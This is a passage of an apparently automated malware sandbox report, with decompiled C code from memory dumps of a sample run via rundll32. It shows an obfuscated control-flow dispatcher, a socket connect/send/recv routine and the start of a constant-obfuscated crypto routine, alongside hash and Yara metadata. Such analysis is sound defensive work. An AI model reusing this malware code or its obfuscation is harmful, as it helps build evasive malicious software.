						while(1) {
							L2:
							_t533 = _t524 - 0x94e79b7;
							if(_t533 > 0) {
								break;
							}
							if(_t533 == 0) {
								_push(_t471);
								_push(_t471);
								_t445 = E00353512(0x20000);
								_t470 = _t445;
								if(_t470 != 0) {
									_t524 = 0x4150ae2;
									goto L12;
								}
							} else {
								if(_t524 == 0x35d4444) {
									_t453 = E00342E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
									_t471 = _v104;
									_t531 =  &(_t531[5]);
									_v20 = _t453;
									_t505 = 0x812254d;
									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
									continue;
								} else {
									if(_t524 == 0x4150ae2) {
										_push(_t471);
										_push(_t471);
										_t529 = E00353512(0x2000);
										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
										goto L12;
									} else {
										if(_t524 == 0x4f6d4ac) {
											_t521 = _t521 + 0x2c;
											asm("sbb esi, esi");
											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
											continue;
										} else {
											if(_t524 == 0x53e4020) {
												E00358CD6(_v164, _t471, _t529, _v108, _v80);
												_t531 =  &(_t531[3]);
												L11:
												_t524 = 0xd965e23;
												L12:
												L13:
												_t471 = _v104;
												goto L1;
											} else {
												if(_t524 == _t505) {
													E003495C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
													E0035E689(_v48, _v172, _v140, _v20, _v72);
													_t531 =  &(_t531[0xa]);
													L28:
													_t471 = _v104;
													_t505 = 0x812254d;
												}
												goto L29;
											}
										}
									}
								}
							}
							goto L30;
						}
						if(_t524 == 0x98aa4b1) {
							E003468DE(_v112, _v120, _v60, _v128, _t470);
							_t531 =  &(_t531[3]);
							_t524 = 0x34e8be;
							goto L28;
						} else {
							if(_t524 == 0xd2f1d9f) {
								_t473 = _v44;
								_t448 = E0035E9E9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
								_t531 =  &(_t531[0x11]);
								if(_t448 == 0) {
									goto L11;
								} else {
									_t467 = E00345AE2(_t473);
									_t524 = 0x35d4444;
									_v100 = _v16 * 0x2c + _t470;
									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
									goto L13;
								}
								L31:
							} else {
								if(_t524 == 0xd582a45) {
									_t524 = 0x94e79b7;
									goto L2;
								} else {
									if(_t524 != 0xd965e23) {
										goto L29;
									} else {
										E003468DE(_v184, _v68, _v24, _v192, _t529);
										_t531 =  &(_t531[3]);
										_t524 = 0x98aa4b1;
										goto L12;
									}
								}
							}
						}
						break;
						L29:
						_t445 = _v100;
					} while (_t524 != 0x34e8be);
					L30:
					return _t445;
					goto L31;
				}
			}








































































                                                                                                                      0x0035ee94
                                                                                                                      0x0035ee9e
                                                                                                                      0x0035eea7
                                                                                                                      0x0035eeab
                                                                                                                      0x0035eeb2
                                                                                                                      0x0035eeb9
                                                                                                                      0x0035eeba
                                                                                                                      0x0035eebb
                                                                                                                      0x0035eec0
                                                                                                                      0x0035eec8
                                                                                                                      0x0035eecb
                                                                                                                      0x0035eed5
                                                                                                                      0x0035eeda
                                                                                                                      0x0035eee1
                                                                                                                      0x0035eee5
                                                                                                                      0x0035eee8
                                                                                                                      0x0035eeed
                                                                                                                      0x0035eef1
                                                                                                                      0x0035eef9
                                                                                                                      0x0035ef01
                                                                                                                      0x0035ef06
                                                                                                                      0x0035ef0e
                                                                                                                      0x0035ef16
                                                                                                                      0x0035ef1e
                                                                                                                      0x0035ef26
                                                                                                                      0x0035ef2e
                                                                                                                      0x0035ef3b
                                                                                                                      0x0035ef3f
                                                                                                                      0x0035ef47
                                                                                                                      0x0035ef52
                                                                                                                      0x0035ef5d
                                                                                                                      0x0035ef68
                                                                                                                      0x0035ef73
                                                                                                                      0x0035ef7e
                                                                                                                      0x0035ef89
                                                                                                                      0x0035ef94
                                                                                                                      0x0035ef9f
                                                                                                                      0x0035efaa
                                                                                                                      0x0035efb5
                                                                                                                      0x0035efc0
                                                                                                                      0x0035efcd
                                                                                                                      0x0035efd1
                                                                                                                      0x0035efd9
                                                                                                                      0x0035efe1
                                                                                                                      0x0035eff7
                                                                                                                      0x0035effe
                                                                                                                      0x0035f009
                                                                                                                      0x0035f011
                                                                                                                      0x0035f01d
                                                                                                                      0x0035f020
                                                                                                                      0x0035f024
                                                                                                                      0x0035f02c
                                                                                                                      0x0035f037
                                                                                                                      0x0035f042
                                                                                                                      0x0035f04d
                                                                                                                      0x0035f055
                                                                                                                      0x0035f062
                                                                                                                      0x0035f066
                                                                                                                      0x0035f06e
                                                                                                                      0x0035f076
                                                                                                                      0x0035f081
                                                                                                                      0x0035f089
                                                                                                                      0x0035f094
                                                                                                                      0x0035f09f
                                                                                                                      0x0035f0aa
                                                                                                                      0x0035f0b5
                                                                                                                      0x0035f0bf
                                                                                                                      0x0035f0c7
                                                                                                                      0x0035f0cf
                                                                                                                      0x0035f0d7
                                                                                                                      0x0035f0df
                                                                                                                      0x0035f0ea
                                                                                                                      0x0035f0f5
                                                                                                                      0x0035f100
                                                                                                                      0x0035f108
                                                                                                                      0x0035f110
                                                                                                                      0x0035f118
                                                                                                                      0x0035f120
                                                                                                                      0x0035f128
                                                                                                                      0x0035f130
                                                                                                                      0x0035f138
                                                                                                                      0x0035f140
                                                                                                                      0x0035f148
                                                                                                                      0x0035f150
                                                                                                                      0x0035f158
                                                                                                                      0x0035f160
                                                                                                                      0x0035f16b
                                                                                                                      0x0035f170
                                                                                                                      0x0035f176
                                                                                                                      0x0035f17e
                                                                                                                      0x0035f186
                                                                                                                      0x0035f18e
                                                                                                                      0x0035f19b
                                                                                                                      0x0035f19e
                                                                                                                      0x0035f1a2
                                                                                                                      0x0035f1aa
                                                                                                                      0x0035f1b7
                                                                                                                      0x0035f1bb
                                                                                                                      0x0035f1c3
                                                                                                                      0x0035f1cb
                                                                                                                      0x0035f1d3
                                                                                                                      0x0035f1db
                                                                                                                      0x0035f1e3
                                                                                                                      0x0035f1eb
                                                                                                                      0x0035f1f3
                                                                                                                      0x0035f1fe
                                                                                                                      0x0035f209
                                                                                                                      0x0035f214
                                                                                                                      0x0035f21c
                                                                                                                      0x0035f224
                                                                                                                      0x0035f228
                                                                                                                      0x0035f22d
                                                                                                                      0x0035f235
                                                                                                                      0x0035f23d
                                                                                                                      0x0035f245
                                                                                                                      0x0035f252
                                                                                                                      0x0035f253
                                                                                                                      0x0035f257
                                                                                                                      0x0035f25f
                                                                                                                      0x0035f267
                                                                                                                      0x0035f26f
                                                                                                                      0x0035f27d
                                                                                                                      0x0035f281
                                                                                                                      0x0035f289
                                                                                                                      0x0035f294
                                                                                                                      0x0035f29c
                                                                                                                      0x0035f2a7
                                                                                                                      0x0035f2b2
                                                                                                                      0x0035f2ba
                                                                                                                      0x0035f2bf
                                                                                                                      0x0035f2c3
                                                                                                                      0x0035f2d0
                                                                                                                      0x0035f2d6
                                                                                                                      0x0035f2de
                                                                                                                      0x0035f2e9
                                                                                                                      0x0035f2f4
                                                                                                                      0x0035f2ff
                                                                                                                      0x0035f307
                                                                                                                      0x0035f30f
                                                                                                                      0x0035f317
                                                                                                                      0x0035f31f
                                                                                                                      0x0035f327
                                                                                                                      0x0035f32f
                                                                                                                      0x0035f337
                                                                                                                      0x0035f33c
                                                                                                                      0x0035f344
                                                                                                                      0x0035f34c
                                                                                                                      0x0035f361
                                                                                                                      0x0035f364
                                                                                                                      0x0035f36b
                                                                                                                      0x0035f373
                                                                                                                      0x0035f37e
                                                                                                                      0x0035f386
                                                                                                                      0x0035f38e
                                                                                                                      0x0035f396
                                                                                                                      0x0035f39e
                                                                                                                      0x0035f3a6
                                                                                                                      0x0035f3b1
                                                                                                                      0x0035f3c7
                                                                                                                      0x0035f3ce
                                                                                                                      0x0035f3d9
                                                                                                                      0x0035f3e1
                                                                                                                      0x0035f3e9
                                                                                                                      0x0035f3f1
                                                                                                                      0x0035f3f9
                                                                                                                      0x0035f401
                                                                                                                      0x0035f40c
                                                                                                                      0x0035f417
                                                                                                                      0x0035f41f
                                                                                                                      0x0035f42a
                                                                                                                      0x0035f435
                                                                                                                      0x0035f440
                                                                                                                      0x0035f44b
                                                                                                                      0x0035f453
                                                                                                                      0x0035f45d
                                                                                                                      0x0035f460
                                                                                                                      0x0035f464
                                                                                                                      0x0035f46c
                                                                                                                      0x0035f474
                                                                                                                      0x0035f47c
                                                                                                                      0x0035f481
                                                                                                                      0x0035f48e
                                                                                                                      0x0035f492
                                                                                                                      0x0035f49a
                                                                                                                      0x0035f4a6
                                                                                                                      0x0035f4ab
                                                                                                                      0x0035f4b1
                                                                                                                      0x0035f4b9
                                                                                                                      0x0035f4be
                                                                                                                      0x0035f4c6
                                                                                                                      0x0035f4d8
                                                                                                                      0x0035f4db
                                                                                                                      0x0035f4e2
                                                                                                                      0x0035f4ea
                                                                                                                      0x0035f4f5
                                                                                                                      0x0035f4fd
                                                                                                                      0x0035f502
                                                                                                                      0x0035f50b
                                                                                                                      0x0035f50f
                                                                                                                      0x0035f517
                                                                                                                      0x0035f522
                                                                                                                      0x0035f522
                                                                                                                      0x0035f522
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f527
                                                                                                                      0x0035f52d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035f533
                                                                                                                      0x0035f6ab
                                                                                                                      0x0035f6ac
                                                                                                                      0x0035f6b2
                                                                                                                      0x0035f6b7
                                                                                                                      0x0035f6bd
                                                                                                                      0x0035f6c3
                                                                                                                      0x00000000
                                                                                                                      0x0035f6c3
                                                                                                                      0x0035f539
                                                                                                                      0x0035f53f
                                                                                                                      0x0035f66e
                                                                                                                      0x0035f673
                                                                                                                      0x0035f677
                                                                                                                      0x0035f67c
                                                                                                                      0x0035f68c
                                                                                                                      0x0035f691
                                                                                                                      0x00000000
                                                                                                                      0x0035f545
                                                                                                                      0x0035f54b
                                                                                                                      0x0035f62a
                                                                                                                      0x0035f62b
                                                                                                                      0x0035f636
                                                                                                                      0x0035f646
                                                                                                                      0x00000000
                                                                                                                      0x0035f551
                                                                                                                      0x0035f557
                                                                                                                      0x0035f603
                                                                                                                      0x0035f608
                                                                                                                      0x0035f610
                                                                                                                      0x00000000
                                                                                                                      0x0035f55d
                                                                                                                      0x0035f564
                                                                                                                      0x0035f5e9
                                                                                                                      0x0035f5ee
                                                                                                                      0x0035f5f1
                                                                                                                      0x0035f5f1
                                                                                                                      0x0035f5f6
                                                                                                                      0x0035f5fa
                                                                                                                      0x0035f5fa
                                                                                                                      0x00000000
                                                                                                                      0x0035f566
                                                                                                                      0x0035f568
                                                                                                                      0x0035f599
                                                                                                                      0x0035f5c0
                                                                                                                      0x0035f5ca
                                                                                                                      0x0035f5cf
                                                                                                                      0x0035f7d8
                                                                                                                      0x0035f7d8
                                                                                                                      0x0035f7dc
                                                                                                                      0x0035f7dc
                                                                                                                      0x00000000
                                                                                                                      0x0035f568
                                                                                                                      0x0035f564
                                                                                                                      0x0035f557
                                                                                                                      0x0035f54b
                                                                                                                      0x0035f53f
                                                                                                                      0x00000000
                                                                                                                      0x0035f533
                                                                                                                      0x0035f6d3
                                                                                                                      0x0035f7cb
                                                                                                                      0x0035f7d0
                                                                                                                      0x0035f7d3
                                                                                                                      0x00000000
                                                                                                                      0x0035f6d9
                                                                                                                      0x0035f6df
                                                                                                                      0x0035f772
                                                                                                                      0x0035f779
                                                                                                                      0x0035f77e
                                                                                                                      0x0035f783
                                                                                                                      0x00000000
                                                                                                                      0x0035f789
                                                                                                                      0x0035f78d
                                                                                                                      0x0035f795
                                                                                                                      0x0035f7ab
                                                                                                                      0x0035f7af
                                                                                                                      0x00000000
                                                                                                                      0x0035f7af
                                                                                                                      0x00000000
                                                                                                                      0x0035f6e1
                                                                                                                      0x0035f6e7
                                                                                                                      0x0035f71e
                                                                                                                      0x00000000
                                                                                                                      0x0035f6e9
                                                                                                                      0x0035f6ef
                                                                                                                      0x00000000
                                                                                                                      0x0035f6f5
                                                                                                                      0x0035f70c
                                                                                                                      0x0035f711
                                                                                                                      0x0035f714
                                                                                                                      0x00000000
                                                                                                                      0x0035f714
                                                                                                                      0x0035f6ef
                                                                                                                      0x0035f6e7
                                                                                                                      0x0035f6df
                                                                                                                      0x00000000
                                                                                                                      0x0035f7e1
                                                                                                                      0x0035f7e1
                                                                                                                      0x0035f7e5
                                                                                                                      0x0035f7fb
                                                                                                                      0x0035f7fb
                                                                                                                      0x00000000
                                                                                                                      0x0035f7fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: b36f1e3edb498be4f474ddb3d1bc0dfbb0ee5cba6d13d515933fbee027532c5a
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 1D2222719083808FE365CF25C58AA4FFBE1BBC4354F108A2DE9D996260E7B19949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,C5005C0B), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction ID: 6a29e3ac87f5f9b0e95b07577220059068a2bdb443e3840c63f2d59567e72b14
                                                                                                                      • Opcode Fuzzy Hash: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction Fuzzy Hash: 26513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034472E Relevance: 13.2, Strings: 10, Instructions: 679COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0034472E(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				char _v2616;
				intOrPtr _v2620;
				char _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _t797;
				void* _t798;
				void* _t812;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t858;
				signed int _t930;
				signed int _t931;
				void* _t936;
				signed int* _t937;
				void* _t945;

				_t937 =  &_v2940;
				_v2888 = 0x58ed27;
				_v2888 = _v2888 | 0x83563905;
				_v2888 = _v2888 * 0x46;
				_t936 = __ecx;
				_t931 = 0x63d9dbc;
				_t832 = 0x70;
				_v2888 = _v2888 * 0x21;
				_v2888 = _v2888 ^ 0x6b204dc3;
				_v2700 = 0xe9de42;
				_v2700 = _v2700 >> 0xa;
				_v2700 = _v2700 ^ 0x00103a77;
				_v2936 = 0x549012;
				_v2936 = _v2936 + 0x60a5;
				_v2936 = _v2936 >> 7;
				_v2936 = _v2936 | 0x1d415c41;
				_v2936 = _v2936 ^ 0x1d4ed04e;
				_v2808 = 0xe235c3;
				_v2808 = _v2808 >> 0x10;
				_v2808 = _v2808 ^ 0xf71055a5;
				_v2808 = _v2808 ^ 0xf7181377;
				_v2788 = 0x4c3834;
				_v2788 = _v2788 >> 0xa;
				_v2788 = _v2788 + 0x8e2;
				_v2788 = _v2788 ^ 0x000a3430;
				_v2844 = 0x57ca8b;
				_v2844 = _v2844 ^ 0xd732e8d9;
				_v2844 = _v2844 << 4;
				_v2844 = _v2844 ^ 0x7657b035;
				_v2920 = 0x3116bc;
				_v2920 = _v2920 / _t832;
				_v2920 = _v2920 << 7;
				_v2920 = _v2920 | 0xbaa7d477;
				_v2920 = _v2920 ^ 0xbab318b9;
				_v2864 = 0x147254;
				_v2864 = _v2864 >> 0x10;
				_v2864 = _v2864 ^ 0xe9282c9a;
				_t833 = 0x42;
				_v2864 = _v2864 * 0x67;
				_v2864 = _v2864 ^ 0xcf208e56;
				_v2628 = 0x43de16;
				_v2628 = _v2628 / _t833;
				_v2628 = _v2628 ^ 0x00078ced;
				_v2880 = 0xe32302;
				_v2880 = _v2880 << 0xa;
				_t834 = 0x66;
				_v2880 = _v2880 / _t834;
				_v2880 = _v2880 | 0x6d622614;
				_v2880 = _v2880 ^ 0x6d625826;
				_v2904 = 0x214f4b;
				_t835 = 0x64;
				_v2904 = _v2904 / _t835;
				_v2904 = _v2904 << 7;
				_v2904 = _v2904 ^ 0x5c13da49;
				_v2904 = _v2904 ^ 0x5c3fedf9;
				_v2632 = 0x15dffa;
				_v2632 = _v2632 | 0xc7418eca;
				_v2632 = _v2632 ^ 0xc75c6c30;
				_v2692 = 0x7a9c1f;
				_v2692 = _v2692 >> 9;
				_v2692 = _v2692 ^ 0x00075ef2;
				_v2840 = 0xf91be9;
				_v2840 = _v2840 << 0xb;
				_v2840 = _v2840 >> 0xc;
				_v2840 = _v2840 ^ 0x00055b58;
				_v2684 = 0x12d980;
				_v2684 = _v2684 ^ 0x93e0c374;
				_v2684 = _v2684 ^ 0x93f47314;
				_v2832 = 0x3fcd4e;
				_t836 = 0x39;
				_v2832 = _v2832 * 0x23;
				_v2832 = _v2832 ^ 0x731c45b4;
				_v2832 = _v2832 ^ 0x7ba35a76;
				_v2932 = 0xb82be4;
				_v2932 = _v2932 >> 2;
				_v2932 = _v2932 + 0xffffbbf6;
				_v2932 = _v2932 ^ 0xe6b723f0;
				_v2932 = _v2932 ^ 0xe690d0e6;
				_v2940 = 0xf6526b;
				_v2940 = _v2940 | 0x896b4159;
				_v2940 = _v2940 >> 3;
				_v2940 = _v2940 | 0x09d41357;
				_v2940 = _v2940 ^ 0x19f157b8;
				_v2676 = 0xe71313;
				_v2676 = _v2676 << 0xd;
				_v2676 = _v2676 ^ 0xe2630a9f;
				_v2640 = 0xe3d77b;
				_v2640 = _v2640 * 0x19;
				_v2640 = _v2640 ^ 0x1648a918;
				_v2816 = 0xdf828c;
				_v2816 = _v2816 | 0xf06a9773;
				_v2816 = _v2816 + 0x1ac7;
				_v2816 = _v2816 ^ 0xf0f0cf03;
				_v2644 = 0x24d1c;
				_v2644 = _v2644 >> 0xd;
				_v2644 = _v2644 ^ 0x000db5f9;
				_v2668 = 0x9507be;
				_v2668 = _v2668 + 0xd758;
				_v2668 = _v2668 ^ 0x009d301b;
				_v2824 = 0xe674f2;
				_v2824 = _v2824 + 0xffffc4e0;
				_v2824 = _v2824 ^ 0xd4611b5a;
				_v2824 = _v2824 ^ 0xd482eada;
				_v2648 = 0x3f77b6;
				_v2648 = _v2648 * 0x1f;
				_v2648 = _v2648 ^ 0x07a98b69;
				_v2916 = 0xdc78a8;
				_v2916 = _v2916 << 5;
				_v2916 = _v2916 / _t836;
				_t837 = 0x7a;
				_v2916 = _v2916 * 0x39;
				_v2916 = _v2916 ^ 0x1b8ad1f1;
				_v2728 = 0xa8155b;
				_v2728 = _v2728 >> 0xd;
				_v2728 = _v2728 ^ 0x000db557;
				_v2924 = 0xc6e5a0;
				_v2924 = _v2924 * 0x2c;
				_v2924 = _v2924 << 5;
				_v2924 = _v2924 | 0x115a405f;
				_v2924 = _v2924 ^ 0x55fa9076;
				_v2856 = 0x96149c;
				_v2856 = _v2856 / _t837;
				_v2856 = _v2856 + 0xf5fc;
				_v2856 = _v2856 ^ 0x000b25f1;
				_v2908 = 0xf2f954;
				_v2908 = _v2908 << 6;
				_v2908 = _v2908 + 0xac42;
				_v2908 = _v2908 ^ 0xa8828693;
				_v2908 = _v2908 ^ 0x943e6ee2;
				_v2732 = 0x9d6f74;
				_t838 = 0x46;
				_v2732 = _v2732 / _t838;
				_v2732 = _v2732 ^ 0x000ebec1;
				_v2820 = 0x59e1c1;
				_v2820 = _v2820 * 0x4d;
				_v2820 = _v2820 / _t838;
				_v2820 = _v2820 ^ 0x00608b59;
				_v2716 = 0x351287;
				_v2716 = _v2716 >> 1;
				_v2716 = _v2716 ^ 0x0018d4d2;
				_v2812 = 0xcb2c1b;
				_t839 = 0x2b;
				_v2812 = _v2812 / _t839;
				_v2812 = _v2812 + 0xffff7101;
				_v2812 = _v2812 ^ 0x0007f207;
				_v2660 = 0xceb36b;
				_t840 = 0x67;
				_v2660 = _v2660 / _t840;
				_v2660 = _v2660 ^ 0x000d619e;
				_v2744 = 0xbb097e;
				_v2744 = _v2744 | 0xecb8e5a6;
				_v2744 = _v2744 << 7;
				_v2744 = _v2744 ^ 0x5df8a0e4;
				_v2912 = 0xf8d451;
				_v2912 = _v2912 >> 4;
				_v2912 = _v2912 | 0xaea8ed4c;
				_v2912 = _v2912 + 0xffff0521;
				_v2912 = _v2912 ^ 0xaea7c2f3;
				_v2752 = 0x565eb7;
				_v2752 = _v2752 * 0x70;
				_v2752 = _v2752 * 0x24;
				_v2752 = _v2752 ^ 0x505f8268;
				_v2652 = 0xc20920;
				_v2652 = _v2652 * 0x66;
				_v2652 = _v2652 ^ 0x4d45043e;
				_v2804 = 0x19938d;
				_v2804 = _v2804 << 0xb;
				_v2804 = _v2804 >> 6;
				_v2804 = _v2804 ^ 0x0331c866;
				_v2708 = 0x9f0ca5;
				_v2708 = _v2708 + 0x5236;
				_v2708 = _v2708 ^ 0x009f1cbf;
				_v2636 = 0x17d7da;
				_v2636 = _v2636 + 0xffff61a3;
				_v2636 = _v2636 ^ 0x001c6ee3;
				_v2772 = 0x640c2e;
				_v2772 = _v2772 | 0xfe977bed;
				_v2772 = _v2772 ^ 0xfef1aca3;
				_v2712 = 0x57713;
				_v2712 = _v2712 | 0x1719e5a8;
				_v2712 = _v2712 ^ 0x171223b6;
				_v2800 = 0xacde46;
				_v2800 = _v2800 << 3;
				_v2800 = _v2800 >> 0xb;
				_v2800 = _v2800 ^ 0x00094896;
				_v2900 = 0xf23167;
				_v2900 = _v2900 << 8;
				_t841 = 0x63;
				_v2900 = _v2900 / _t841;
				_v2900 = _v2900 + 0xcf21;
				_v2900 = _v2900 ^ 0x02793070;
				_v2720 = 0x2ffea5;
				_v2720 = _v2720 >> 0xa;
				_v2720 = _v2720 ^ 0x000a3377;
				_v2760 = 0x7162f3;
				_v2760 = _v2760 + 0x3cd5;
				_t842 = 0x38;
				_v2760 = _v2760 / _t842;
				_v2760 = _v2760 ^ 0x0007aff4;
				_v2928 = 0x75cba7;
				_v2928 = _v2928 >> 6;
				_t843 = 0x74;
				_v2928 = _v2928 / _t843;
				_t844 = 0x21;
				_v2928 = _v2928 * 0x5b;
				_v2928 = _v2928 ^ 0x00010bb2;
				_v2896 = 0xbdd326;
				_v2896 = _v2896 | 0x8e80784e;
				_v2896 = _v2896 + 0xffff4642;
				_v2896 = _v2896 + 0xfffff2a7;
				_v2896 = _v2896 ^ 0x8eb0d4b0;
				_v2724 = 0x540c5f;
				_v2724 = _v2724 | 0x0f00b7a6;
				_v2724 = _v2724 ^ 0x0f539187;
				_v2672 = 0x9e9c9c;
				_v2672 = _v2672 | 0xc48b5739;
				_v2672 = _v2672 ^ 0xc4908703;
				_v2776 = 0xa23bdf;
				_v2776 = _v2776 * 0x51;
				_v2776 = _v2776 + 0xe0c7;
				_v2776 = _v2776 ^ 0x335416a6;
				_v2680 = 0x681f8;
				_v2680 = _v2680 + 0xffff4f6a;
				_v2680 = _v2680 ^ 0x00015d99;
				_v2784 = 0xd006bd;
				_v2784 = _v2784 / _t844;
				_v2784 = _v2784 + 0xffffb229;
				_v2784 = _v2784 ^ 0x00021ec3;
				_v2884 = 0x9df7f6;
				_v2884 = _v2884 << 3;
				_v2884 = _v2884 >> 0xa;
				_v2884 = _v2884 ^ 0x9c3d07c3;
				_v2884 = _v2884 ^ 0x9c378ea0;
				_v2664 = 0x8a5c5e;
				_v2664 = _v2664 + 0xb05;
				_v2664 = _v2664 ^ 0x008bdf18;
				_v2892 = 0xf8cc9d;
				_v2892 = _v2892 * 0x75;
				_v2892 = _v2892 * 0x2f;
				_v2892 = _v2892 + 0x5b88;
				_v2892 = _v2892 ^ 0xe0504abc;
				_v2768 = 0xf7b3ac;
				_v2768 = _v2768 * 0x12;
				_v2768 = _v2768 * 0x37;
				_v2768 = _v2768 ^ 0xbde7c305;
				_v2736 = 0x24d80;
				_v2736 = _v2736 + 0xc084;
				_v2736 = _v2736 ^ 0x0003dff9;
				_v2756 = 0xcbd51;
				_v2756 = _v2756 ^ 0x3e0e537e;
				_t845 = 0x33;
				_v2756 = _v2756 / _t845;
				_v2756 = _v2756 ^ 0x01338860;
				_v2876 = 0x572b9a;
				_v2876 = _v2876 | 0xf33633ff;
				_v2876 = _v2876 + 0xffffc963;
				_t846 = 9;
				_v2876 = _v2876 * 0x5a;
				_v2876 = _v2876 ^ 0x97d6d328;
				_v2780 = 0x1c7f97;
				_v2780 = _v2780 | 0xd857d991;
				_v2780 = _v2780 ^ 0x2bc247dc;
				_v2780 = _v2780 ^ 0xf39978d6;
				_v2828 = 0x976a05;
